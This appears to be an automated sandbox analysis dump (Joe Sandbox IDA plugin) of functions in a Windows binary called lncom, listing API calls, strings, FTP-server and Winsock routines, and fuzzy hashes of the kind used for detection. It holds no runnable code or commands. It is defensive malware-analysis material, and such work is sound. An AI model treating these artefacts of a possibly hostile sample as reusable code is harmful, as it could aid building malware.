Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Startupsocket
String ID:
API String ID: 3996037109-0
Opcode ID: e0fc25c468cf405afd8dc3d1b7a1483ccfdb7c6bed48460ddf7ee0814ae0dc89
Instruction ID: d8e49e5376188be564e93aa131a3d6c686fc46abd17d4a1687947f8c8592669e
Opcode Fuzzy Hash: e0fc25c468cf405afd8dc3d1b7a1483ccfdb7c6bed48460ddf7ee0814ae0dc89
Instruction Fuzzy Hash: 9D216070600209EBDB04DF14C945B9A77A9FF58314F20826FB9089F2D2D7B9DA81CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 004A1073 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 227COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(0EEDFADE,C0000025,00000008,?,00000004,00000004,?,?,?,?,?,00000004,?,00000000,?), ref: 004A1146
RaiseException.KERNEL32(0EEFFACE,00000001,00000003,00000000), ref: 004A132F

Strings

cctrAddr, xrefs: 004A12B4
xx.cpp, xrefs: 004A10DF
xx.cpp, xrefs: 004A12AF
typeID || (reThrow && (flags & XDF_ISDELPHIEXCEPTION)), xrefs: 004A10E4

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ExceptionRaise
String ID: cctrAddr$typeID || (reThrow && (flags & XDF_ISDELPHIEXCEPTION))$xx.cpp$xx.cpp
API String ID: 3997070919-2095381217
Opcode ID: 0a8b07627ac52637d4ac259433ce787c2fac35f3b25bf15d3efb2e9c58f9f4f9
Instruction ID: 5b0ccab88f982a95b7af99ad78f9c4469ca6148bd991c40b6a777f554c714f83
Opcode Fuzzy Hash: 0a8b07627ac52637d4ac259433ce787c2fac35f3b25bf15d3efb2e9c58f9f4f9
Instruction Fuzzy Hash: 61A16874A01218AFCB14CF94D885E9EBBB1BF5D314F05816AF9086B3A1D735E881CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0044001C Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

APIs

@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro.LNCOM ref: 004400DB

Strings

tcp, xrefs: 0044023A
$530 Please login with USER and PASS., xrefs: 00440070
150 APPE supported. Ready to append file "%s" at offset %d., xrefs: 00440375
Transfer Ok, xrefs: 004400E8

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AbortingCtrlFtpsrvc@Socket@Transfer$qqro
String ID: $530 Please login with USER and PASS.$150 APPE supported. Ready to append file "%s" at offset %d.$Transfer Ok$tcp
API String ID: 3097502609-3001960314
Opcode ID: 97e255e6f09b5576e9fd1ba334511ecf7e8bb7a0e75b5e95c41e304dbccfb928
Instruction ID: d3eb7bb715ca0784103bb48643db0f11d1b39382a77b3c96c92820ac4b741ae8
Opcode Fuzzy Hash: 97e255e6f09b5576e9fd1ba334511ecf7e8bb7a0e75b5e95c41e304dbccfb928
Instruction Fuzzy Hash: 1AB1D474A006089FDB54CF59C884AEABBF1BF49315F5580FAE948AB352D734AE81CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0043C798 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 207COMMON

Download Yara Rule

APIs

@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro.LNCOM ref: 0043C857

Strings

tcp, xrefs: 0043C9B7
Transfer Ok, xrefs: 0043C864
150 Opening data connection for %s., xrefs: 0043CAAB
$530 Please login with USER and PASS., xrefs: 0043C7EC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AbortingCtrlFtpsrvc@Socket@Transfer$qqro
String ID: $530 Please login with USER and PASS.$150 Opening data connection for %s.$Transfer Ok$tcp
API String ID: 3097502609-2960159226
Opcode ID: f961c2a5be524ddcf0d548c71e9d41461b8b118dc58db8d55620bf899545d069
Instruction ID: 776a3f46d135950e7b17ac118159433d8abbacf50fc3f61e2d6e63d5f44be06f
Opcode Fuzzy Hash: f961c2a5be524ddcf0d548c71e9d41461b8b118dc58db8d55620bf899545d069
Instruction Fuzzy Hash: C9A1E674A006489FCB54CF59D885AEABBF1BF49314F5580F6E948AB312D734AA81CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0042A724 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON

Download Yara Rule

APIs

@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString.LNCOM ref: 0042A7F2
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString.LNCOM ref: 0042A894

Strings

Rdswds^i`r^cddo^lnehghde , xrefs: 0042A866
~P\, xrefs: 0042A7D0
8, xrefs: 0042A982
Dedected burute force atack from your ip adress (, xrefs: 0042A7B5

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AnsiAnswer$qqr17CtrlFtpsrvc@SendSocket@StringSystem@
String ID: 8$Dedected burute force atack from your ip adress ($Rdswds^i`r^cddo^lnehghde $~P\
API String ID: 2277310912-3632911227
Opcode ID: 58ce098948d6852d7316c50afdd9ca4abc3209f728cd8cf6c39dba03a81db045
Instruction ID: 28cfd857999f0fd20f1b641cfa17148788dfc2809636ba0d5165158b18d13518
Opcode Fuzzy Hash: 58ce098948d6852d7316c50afdd9ca4abc3209f728cd8cf6c39dba03a81db045
Instruction Fuzzy Hash: 6D815C34A1025DDBCB00EFD5E885ADEB7B5FF86308F50406AE800AB356DB789946CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004548B8 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON

Download Yara Rule

APIs

InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00454A64
GetVersion.KERNEL32(00000000,00454B13), ref: 00454954

Part of subcall function 00454D64: CreatePopupMenu.USER32 ref: 00454D7F

Strings

?, xrefs: 0045496F
,, xrefs: 00454968

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Menu$CreateInsertItemPopupVersion
String ID: ,$?
API String ID: 133695497-2308483597
Opcode ID: 3f15a60374c3621b9f99ae78e32fb2afaf4c480d73333b85c6876fb899ef5820
Instruction ID: d8c556cef555994baa894cbcfba0046d8d7cc1193833dead62eba65602423be8
Opcode Fuzzy Hash: 3f15a60374c3621b9f99ae78e32fb2afaf4c480d73333b85c6876fb899ef5820
Instruction Fuzzy Hash: 3E61F370A002449BDB20DF7AD88169A7BF5AF89309F05457BEC44DB36BD638DC49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00452DB4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 150COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,00452F65,?,00000000,00000000,00000000), ref: 00452DFE
GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,00452F65,?,00000000,00000000,00000000), ref: 00452E08

Part of subcall function 004950E0: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00495111

GetProfileStringA.KERNEL32(windows,device,00452F74,?,0000004F), ref: 00452E87

Strings

device, xrefs: 00452E7D
~'E, xrefs: 00452EC8
windows, xrefs: 00452E82

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ErrorLastString$LoadProfile
String ID: device$windows$~'E
API String ID: 1759087498-248757582
Opcode ID: 6f8c7dbd1cb661d8662c5192fee38461dac86b1adfc11c9711d3efb6b5874488
Instruction ID: 0178a2880acad43d14690e0abde4dd1043969e900f681e9f46ffc9077591b7fb
Opcode Fuzzy Hash: 6f8c7dbd1cb661d8662c5192fee38461dac86b1adfc11c9711d3efb6b5874488
Instruction Fuzzy Hash: E4518575A00204AFDB10EFA5C942B9EB7F8EB49305F20457BF904E7252D678AD05CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00432FEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

@Wsockbuf@TBuffer@Peek$qqrri.LNCOM ref: 00433057

Strings

TryToSend failed, xrefs: 0043317D
3', xrefs: 00433174

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Buffer@Peek$qqrriWsockbuf@
String ID: 3'$TryToSend failed
API String ID: 1174906636-1044583378
Opcode ID: e4f6bb69825f9a455296755be36c39915a06bd8023c86723f7bfba51a0c16f8c
Instruction ID: b6d1c5d415d4e3ad064004e1a26a26e6b9860763a7cb45affc9c810dbcd61d5d
Opcode Fuzzy Hash: e4f6bb69825f9a455296755be36c39915a06bd8023c86723f7bfba51a0c16f8c
Instruction Fuzzy Hash: 99511530A04149DFDF14DF98C589AAEB7F0AF09315F2451EAD405AB3A2C3789F85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0046C5CC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,0046C777,?,00000000,?,0046C7D9,00000000,?,00477AF8,00479128,?,00000000,00477B46), ref: 0046C622
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 0046C68A
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0046C733,?,80000002,00000000), ref: 0046C6C4
RegCloseKey.ADVAPI32(?,0046C73A,00000000,?,00000100,00000000,0046C733,?,80000002,00000000), ref: 0046C72D

Strings

layout text, xrefs: 0046C6BB
System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0046C674

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: 4569479ba3e67f0bd8470b161cdba41b1c1e956b19e0b8e0b55184c5f1a739a0
Instruction ID: 0216fc886cec43579d80d6f4007360b2f7d1001cc29aeb1916d91e2ee5c3b20c
Opcode Fuzzy Hash: 4569479ba3e67f0bd8470b161cdba41b1c1e956b19e0b8e0b55184c5f1a739a0
Instruction Fuzzy Hash: 73416AB4A002099FDB10DFA4C981BAEB7F9EB49305F5040A6E504A7351E778AE40DF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0047558C Relevance: 10.6, APIs: 7, Instructions: 122COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 004755C5
MulDiv.KERNEL32(?,?,?), ref: 004755DF
MulDiv.KERNEL32(?,?,?), ref: 0047560D
MulDiv.KERNEL32(?,?,?), ref: 00475623
MulDiv.KERNEL32(?,?,?), ref: 0047565B
MulDiv.KERNEL32(?,?,?), ref: 0047566F
MulDiv.KERNEL32(00000000,?,00000000), ref: 004756A7

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b519537737de356a8e849add39ad87971c464d41ec41ee080b2e6ab95b7e4eb
Instruction ID: ebfe4907b1be55d506e6278ce89f243f6b873c1ebe151ae47205574a9e8647cf
Opcode Fuzzy Hash: 9b519537737de356a8e849add39ad87971c464d41ec41ee080b2e6ab95b7e4eb
Instruction Fuzzy Hash: 83414F70205B40AFC320AA69C584BA7B7F9AF44704F44881EB9C9CB756CB78FC85C729

Uniqueness

Uniqueness Score: -1.00%

Function 0045F4D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 0045F522
MulDiv.KERNEL32(?,?,000009EC), ref: 0045F539
GetDC.USER32(00000000), ref: 0045F550
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,0045F60B,?,00000000,?,?,000009EC,?,?,000009EC), ref: 0045F574
GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,0045F5EB,?,?,00000000,00000000,00000008,?,00000000,0045F60B), ref: 0045F5A7

Strings

`, xrefs: 0045F508

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: BitsFileMeta
String ID: `
API String ID: 858000408-2679148245
Opcode ID: edc9606b3b4aa4b9856129e7d1887ad82fed1c700f251c9129f76a3e60691ad6
Instruction ID: 0c700f687e18ee218ba77ec09b6f6e68b02639c931358add4514665361c2c532
Opcode Fuzzy Hash: edc9606b3b4aa4b9856129e7d1887ad82fed1c700f251c9129f76a3e60691ad6
Instruction Fuzzy Hash: 5B314575A00208BBDB01EFD5C981AAEB7B8EF48704F1044AAF904EB252D7789D04D769

Uniqueness

Uniqueness Score: -1.00%

Function 0040E65C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000002,?), ref: 0040E6AA
gethostbyname.WS2_32(00000000), ref: 0040E6B8
WSACleanup.WS2_32 ref: 0040E6C6
inet_ntoa.WS2_32 ref: 0040E74C
WSACleanup.WS2_32 ref: 0040E778

Strings

D, xrefs: 0040E7B9

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Cleanup$Startupgethostbynameinet_ntoa
String ID: D
API String ID: 1870061810-2746444292
Opcode ID: aad3f0775c9013a0a1574b8bd0d2f0464ba766198db431d21807dd837162cdcb
Instruction ID: 7a44e4544a36f79786dacbbbeaf52ab66441f40619d97d3c03d085a311463983
Opcode Fuzzy Hash: aad3f0775c9013a0a1574b8bd0d2f0464ba766198db431d21807dd837162cdcb
Instruction Fuzzy Hash: 3A41DB34A1011E9BCF00EFD1D5456DDB3B9FF99308F60856BE80877252E7789A05CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00434114 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_getservbyname$qqrpct1.LNCOM(00000000,00434253), ref: 004341CB
@Wsocket@WSocket_getservbyname$qqrpct1.LNCOM(00000000,00434253), ref: 004341DB

Part of subcall function 00431B20: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00431B3A

@Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,00434253), ref: 004341F3
@Wsocket@WSocket_ntohs$qqrus.LNCOM(00000000,00434253), ref: 00434222

Strings

WSocketResolvePort: Cannot convert port '%s', Error #%d, xrefs: 00434205
WSocketResolvePort: Invalid Port., xrefs: 0043415F

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Socket_getservbyname$qqrpct1$AnsiError$qqrvLastProc$qqrx17SocketSocket_Socket_ntohs$qqrusStringSystem@
String ID: WSocketResolvePort: Cannot convert port '%s', Error #%d$WSocketResolvePort: Invalid Port.
API String ID: 863172211-2667197206
Opcode ID: 2a3460a788c40d9d1c5de097104885eebe1c80a9cb4a64567395a080f1283ad8
Instruction ID: 656c3efb39674a77302d3f452255ac83eceade084f849d500600518309366e29
Opcode Fuzzy Hash: 2a3460a788c40d9d1c5de097104885eebe1c80a9cb4a64567395a080f1283ad8
Instruction Fuzzy Hash: A4413F74A0024C9FDF00EFE5C846ADDBBB4EF49308F5054BAE404AB265D778AE45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00434834 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_WSACancelAsyncRequest$qqrui.LNCOM ref: 00434893
@Wsocket@WSocket_inet_addr$qqrpc.LNCOM ref: 004348C2
@Wsocket@WSocket_WSAAsyncGetHostByAddr$qqruiipciit3i.LNCOM(00000401,?,00000002,00000004), ref: 004348E8
@Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000001), ref: 00434914

Strings

%s: can't start DNS lookup, error #%d, xrefs: 0043492C
DNS lookup: invalid host name., xrefs: 00434860

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Socket_$Async$Addr$qqruiipciit3iCancelError$qqrvHostLastRequest$qqruiSocket_inet_addr$qqrpc
String ID: %s: can't start DNS lookup, error #%d$DNS lookup: invalid host name.
API String ID: 1781718313-3768544318
Opcode ID: 60d5f8bf2c61d9e0d798a8a04c220c6a2c98579866ef2048adf13b85be896506
Instruction ID: faa9b9f2a9e803d0555a6f4e9c64f2e33346cbba17f0220fdc6235aa2aa00958
Opcode Fuzzy Hash: 60d5f8bf2c61d9e0d798a8a04c220c6a2c98579866ef2048adf13b85be896506
Instruction Fuzzy Hash: 3231B674A00108EFDB14DBA9C985BDDBBF4EF49304F6040E5E504AB361D774AE85CB59

Uniqueness
